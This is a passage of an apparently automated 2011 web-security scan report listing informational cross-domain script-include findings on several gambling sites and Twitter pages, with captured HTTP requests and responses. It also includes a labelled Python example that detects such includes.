Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:53 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:53 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:53 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:53 GMT
Connection: close
Content-Length: 102707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.117. https://scratch.betsson.com/en/Sports/Bowling

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Bowling

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Sports/Bowling HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:08 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:08 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:08 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:08 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:08 GMT
Connection: close
Content-Length: 102693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.118. https://scratch.betsson.com/en/Sports/Darts

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Darts

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Sports/Darts HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:24 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:24 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:24 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:24 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:23 GMT
Connection: close
Content-Length: 102702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.119. https://scratch.betsson.com/en/Sports/Goal-Kick

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Goal-Kick

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Sports/Goal-Kick HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:39 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:39 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:39 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:39 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:38 GMT
Connection: close
Content-Length: 102702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.120. https://scratch.betsson.com/en/Sports/Gone-Fishing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Gone-Fishing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Sports/Gone-Fishing HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:13 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:13 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:13 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:13 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:13 GMT
Connection: close
Content-Length: 102702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.121. https://scratch.betsson.com/en/Sports/Hippodrome

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Hippodrome

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Sports/Hippodrome HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:15 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:15 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:15 GMT
Connection: close
Content-Length: 102707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.122. https://scratch.betsson.com/en/Sports/Ready-Set-Go

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Ready-Set-Go

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Sports/Ready-Set-Go HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:34 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:34 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:34 GMT
Connection: close
Content-Length: 102712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.123. https://scratch.betsson.com/en/Sports/Road-Racing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/Road-Racing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Sports/Road-Racing HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:28 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:28 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:28 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:28 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:27 GMT
Connection: close
Content-Length: 102694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.124. https://scratch.betsson.com/en/Sports/World-Champions

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Sports/World-Champions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Sports/World-Champions HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:50:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:50:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:50:38 GMT
Connection: close
Content-Length: 102712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.125. http://sv.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Home.aspx HTTP/1.1
Host: sv.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tozxwiay5gsnm045qnofca45; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:03:33 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: UniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.126. http://sv.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.winnings.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: sv.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=nr3a3rsougqdtponk6jao9tic6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=sv; expires=Wed, 15-Jun-2011 12:33:43 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:33:43 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=sv; expires=Wed, 15-Jun-2011 12:33:43 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123554; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540929; expires=Tue, 15-May-2012 12:33:44 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:33:44 GMT
Connection: close
Content-Length: 23007

<!DOCTYPE html>
<html dir="ltr" lang="sv-SE">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Plats #1 för ROLIG Vinstrik Onlineunderhållning! | Winnings.com</title>
<link rel="alterna
...[SNIP]...
<link rel="pingback" href="http://sv.winnings.com/xmlrpc.php" />
<script type="text/javascript" src="http://www.cdnfo.com/scripts/swfobject1-5.js" language="javascript"></script>
<script type="text/javascript" src="http://www.cdnfo.com/scripts/js.js" language="javascript"></script>
...[SNIP]...

19.127. http://twitter.com/PostcodeLottery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /PostcodeLottery

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /PostcodeLottery HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-9250-27328
ETag: "509908394cb0e30c33cd8bdb160b0b2c"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.03576
Content-Type: text/html; charset=utf-8
Content-Length: 59180
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e61ab982b4aed01008cdec3c1c8138b280a18ccf
Set-Cookie: k=173.193.214.243.1305547124447352; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712445382826; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOYurPgvAToHaWQiJWFiMDRlMGMzNDNkYzhh%250AM2RlODFlOGM3MTY2MDI1ZDY2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b4682015a7f1885320edf06ef6f2b95fed508082; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346" type="text/javascript"></script>
...[SNIP]...
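
Added example, not part of the XSS.CX report and not Burp's own code: the check behind these "cross-domain script include" entries, reproduced in Python over a fragment modelled on the scratch.betsson.com response in 19.119. It parses every <script src> in a response body, resolves it against the page URL, and returns each script whose host differs from the page's host. It also flags an https page pulling a script over plain http; the entries above do not separate that case out, but it turns a trust-the-third-party finding into one an on-path attacker can exploit. The sample HTML, the /Scripts/local.js and site.js includes and the http://www.google.com/jsapi line on an https page are constructed for the demonstration and are not taken from the captured responses.

```python
"""Reproduce a scanner's "cross-domain script include" check over a captured response.

Given the page URL and the HTML body, list every <script src> whose host differs
from the page's host, and note when an https page pulls a script over plain http.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def cross_domain_scripts(page_url, html):
    """Return [(absolute_script_url, script_host, downgrade), ...] for every script
    loaded from a host other than the page's own. `downgrade` is True when an
    https page loads the script over http."""
    page = urlsplit(page_url)
    page_host = (page.hostname or "").lower()
    collector = _ScriptSrcCollector()
    collector.feed(html)
    findings = []
    seen = set()
    for src in collector.srcs:
        absolute = urljoin(page_url, src)       # resolves relative and // URLs
        target = urlsplit(absolute)
        if target.scheme not in ("http", "https"):
            continue                            # data:, javascript: etc. are not includes
        host = (target.hostname or "").lower()
        if host == page_host:
            continue                            # same host: not a cross-domain include
        if absolute in seen:
            continue                            # report each URL once
        seen.add(absolute)
        downgrade = page.scheme == "https" and target.scheme == "http"
        findings.append((absolute, host, downgrade))
    return findings


def report(page_url, html):
    """One line per finding, in the style of the report entries."""
    lines = []
    for url, host, downgrade in cross_domain_scripts(page_url, html):
        note = "  [https page loading http script]" if downgrade else ""
        lines.append(f"{host}: {url}{note}")
    return lines


# Constructed fragment modelled on the scratch.betsson.com response in 19.119.
# The two same-origin includes and the http://www.google.com/jsapi line are
# invented for the demonstration; only the llnwd.net URLs appear in the report.
SAMPLE_PAGE_URL = "https://scratch.betsson.com/en/Sports/Goal-Kick"
SAMPLE_HTML = """
<html><head>
<script type="text/javascript" src="/Scripts/local.js"></script>
<script type="text/javascript" src="https://scratch.betsson.com/Scripts/site.js"></script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
</head></html>
"""

if __name__ == "__main__":
    print("\n".join(report(SAMPLE_PAGE_URL, SAMPLE_HTML)))
```

The host comparison is exact, as in the entries above, so a2.twimg.com counts as cross-domain for twitter.com even though both belong to the same operator; what the Information-severity finding records is that the page's integrity now depends on that host, whoever runs it. Enumerating the hosts is all this check does; it proves nothing about whether any of them can be tampered with.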

19.128. http://twitter.com/PrimeScratch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /PrimeScratch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /PrimeScratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-38253-35739
